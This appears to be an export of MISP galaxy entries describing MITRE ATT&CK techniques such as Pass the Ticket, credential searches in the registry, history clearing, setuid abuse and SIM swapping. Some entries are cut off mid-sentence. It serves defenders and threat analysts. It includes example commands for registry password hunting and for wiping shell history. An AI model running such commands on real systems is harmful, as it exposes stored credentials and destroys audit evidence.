In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges
Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).

Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.

The tag is: `misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097"`

Pass the Ticket - T1097 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003"` with estimative-language:likelihood-probability="almost-certain"

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**Disabling Security Tools - T1089**

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

The tag is: `misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089"`

Disabling Security Tools - T1089 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"
Space after Filename - T1151

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1151"

Space after Filename - T1151 has relationships with:


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Escape to Host - T1611

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.
Create strategic plan - T1231

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1231).

Strategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)

The tag is: misp-galaxy:mitre-attack-pattern="Create strategic plan - T1231"

Capture SMS Messages - T1412

A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.

On Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement.

On iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.

The tag is: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412"
Credentials in Registry - T1214

The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

- Local Machine Hive: `<code>reg query HKLM /f password /t REG_SZ /s</code>`
- Current User Hive: `<code>reg query HKCU /f password /t REG_SZ /s</code>`

The tag is: `misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214"

Credentials in Registry - T1214 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"` with `estimative-language:likelihood-probability="almost-certain"

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System Time Discovery - T1124

An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)

System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing `<code>net time \hostname</code>` to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using `<code>w32tm /tz</code>`. (Citation: Technet Windows Time Service)

This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They’re Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
### Determine strategic target - T1241

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1241).

An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

### Standard Cryptographic Protocol - T1521

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: `misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521"`
**Browser Bookmark Discovery - T1217**

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.

The tag is: `misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217"`

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**Netsh Helper DLL - T1128**

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at `<code>HKLM\SOFTWARE\Microsoft\Netsh</code>`.

Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)

Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)

The tag is: `misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1128"`

Netsh Helper DLL - T1128 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007"` with estimative-language:likelihood-probability="almost-certain"

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Remote Access Software - T1219

An adversary may use legitimate desktop support and remote access software, such as TeamViewer, Go2Assist, LogMeIn, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219"

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<td><a href="https://blog.crysys.hu/2013/03/teamspy/">https://blog.crysys.hu/2013/03/teamspy/</a></td>
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External Remote Services - T1133

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.

Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. (Citation: Volexity Virtual Private
Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubectl, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)

The tag is: `misp-galaxy:mitre-attack-pattern="External Remote Services - T1133"

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<td><a href="https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/">https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/</a></td>
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**Obfuscation or cryptography - T1313**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1313).

Obfuscation is the act of creating communications that are more difficult to understand. Encryption transforms the communications such that it requires a key to reverse the encryption. (Citation: FireEyeAPT28)

The tag is: `misp-galaxy:mitre-attack-pattern="Obfuscation or cryptography - T1313"

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**Access Token Manipulation - T1134**

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)

Any standard user can use the `<code>runas</code>` command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

The tag is: `misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134"`

**Account Access Removal - T1531**

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.

Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)

The tag is: `misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531"`
Network Share Discovery - T1135

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the `<code>net view \\remotesystem</code>` command. It can also be used to query shared drives on the local system using `<code>net share</code>`.

The tag is: `misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"

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<td><a href="https://en.wikipedia.org/wiki/Shared_resource">https://en.wikipedia.org/wiki/Shared_resource</a></td>
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Office Application Startup - T1137

Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)

The tag is: `misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137"

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Dynamic Data Exchange - T1173

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173"

Dynamic Data Exchange - T1173 has relationships with:


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Obfuscate operational infrastructure - T1318

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1318).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)

The tag is: *misp-galaxy:mitre-attack-pattern="Obfuscate operational infrastructure - T1318"

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Capture Clipboard Data - T1414

Adversaries may abuse Clipboard Manager APIs to obtain sensitive information copied to the global clipboard. For example, passwords being copy-and-pasted from a password manager app could be captured by another application installed on the device. (Citation: Fahl-Clipboard)

On Android, `<code>ClipboardManager.OnPrimaryClipChangedListener</code>` can be used by applications to register as a listener and monitor the clipboard for changes. (Citation: Github Capture Clipboard 2019)

Android 10 mitigates this technique by preventing applications from accessing clipboard data unless the application is on the foreground or is set as the device's default input method editor (IME). (Citation: Android 10 Privacy Changes)

The tag is: *misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414"

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SIM Card Swap - T1451

An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account (Citation: NYGov-Simswap) (Citation: Motherboard-Simswap2). The adversary could then obtain SMS messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap).

One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account (Citation: Guardian-Simswap) (Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap).

The tag is: misp-galaxy:mitre-attack-pattern="SIM Card Swap - T1451"

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<td><a href="http://betanews.com/2016/02/12/covering-all-the-bases-on-sim-swap-scams/">http://betanews.com/2016/02/12/covering-all-the-bases-on-sim-swap-scams/</a></td>
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<td><a href="https://techcrunch.com/2017/08/23/i-was-hacked/">https://techcrunch.com/2017/08/23/i-was-hacked/</a></td>
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URL Scheme Hijacking - T1415

An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).

The tag is: misp-galaxy:mitre-attack-pattern="URL Scheme Hijacking - T1415"

Table 3383. Table References
Clear Command History - T1146

macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appearing in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.

The tag is: <code>misp-galaxy:mitre-attack-pattern="Clear Command History - T1146"</code>

Clear Command History - T1146 has relationships with:


Table 3384. Table References

System Location Discovery - T1614

Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings. (Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as...
GetLocaleInfoW can also be used to determine the locale of the host. (Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance. (Citation: AWS Instance Identity Documents) (Citation: Microsoft Azure Instance Metadata 2021)

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services. (Citation: Securelist Trasparent Tribe 2020) (Citation: Sophos Geolocation 2016)

The tag is: misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614"

Table 3385. Table References

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Password Filter DLL - T1174

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.

Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174"

Password Filter DLL - T1174 has relationships with:

**Device Type Discovery - T1419**

On Android, device type information is accessible to apps through the `android.os.Build` class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.

The tag is: `misp-galaxy:mitre-attack-pattern="Device Type Discovery - T1419"`

---

**Spearphishing via Service - T1194**

Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: `misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194"`

Spearphishing via Service - T1194 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003"` with estimative-language:likelihood-probability="almost-certain"
Malicious Shell Modification - T1156

<code>~/.bash_profile</code> and <code>~/.bashrc</code> are shell scripts that contain shell commands. These files are executed in a user’s context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the <code>~/.bash_profile</code> script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the <code>~/.bashrc</code> script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment.

The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>.

Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware).

The tag is: <i>misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156"</i>

Malicious Shell Modification - T1156 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"

Supply Chain Compromise - T1195

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

- Manipulation of development tools
• Manipulation of a development environment
• Manipulation of source code repositories (public or private)
• Manipulation of source code in open-source dependencies
• Manipulation of software update/distribution mechanisms
• Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware)
• Replacement of legitimate software with modified versions
• Sales of modified/counterfeit products to legitimate distributors
• Shipment interdiction

While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195"

Table 3390. Table References

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Setuid and Setgid - T1166

When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user's context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn't need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.

An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user's context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).

The tag is: <code>misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166"</code>

Setuid and Setgid - T1166 has relationships with:


Table 3391. Table References

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Local Job Scheduling - T1168

On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).

**cron**

System-wide cron jobs are installed by modifying <code>/etc/crontab</code> file,
<code>/etc/cron.d/</code> directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.

Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.

at

The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.

launchd

Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called <code>StartCalendarInterval</code> with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.

The tag is: <code>misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168"</code>

Local Job Scheduling - T1168 has relationships with:


Table 3392. Table References

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Control Panel Items - T1196

Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPLApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)

For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)

Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.

The tag is: `misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196"

Control Panel Items - T1196 has relationships with:


Table 3393. Table References

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C2 protocol development - T1352

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1352).

Command and Control (C2 or C&C) is a method by which the adversary communicates with malware. An adversary may use a variety of protocols and methods to execute C2 such as a
centralized server, peer to peer, IRC, compromised web sites, or even social media. (Citation: HAMMERTOSS2015)

The tag is: misp-galaxy:mitre-attack-pattern="C2 protocol development - T1352"

Table 3394. Table References

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**Compiled HTML File - T1223**

Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223"

Compiled HTML File - T1223 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

Table 3395. Table References

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**Create implementation plan - T1232**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content
Implementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)

The tag is: `misp-galaxy:mitre-attack-pattern="Create implementation plan - T1232"

**Determine operational element - T1242**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1242).

If going from strategic down to tactical or vice versa, an adversary would next consider the operational element. For example, the specific company within an industry or agency within a government. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: `misp-galaxy:mitre-attack-pattern="Determine operational element - T1242"

**Identify gap areas - T1225**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1225).

Leadership identifies gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: ODNIIntegration) (Citation: ICD115)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify gap areas - T1225"

**Map network topology - T1252**

This object is deprecated as its content has been merged into the enterprise domain. Please see the
A network topology is the arrangement of the various elements of a network (e.g., servers, workstations, printers, routers, firewalls, etc.). Mapping a network allows an adversary to understand how the elements are connected or related. (Citation: man traceroute) (Citation: Shodan Tutorial)

The tag is: *misp-galaxy:mitre-attack-pattern*="Map network topology - T1252"

### Table 3399. Table References

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### Enumerate client configurations - T1262

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1262).

Client configurations information such as the operating system and web browser, along with additional information such as version or language, are often transmitted as part of web browsing communications. This can be accomplished in several ways including use of a compromised web site to collect details on visiting computers. (Citation: UnseenWorldOfCookies) (Citation: Panopticlick)

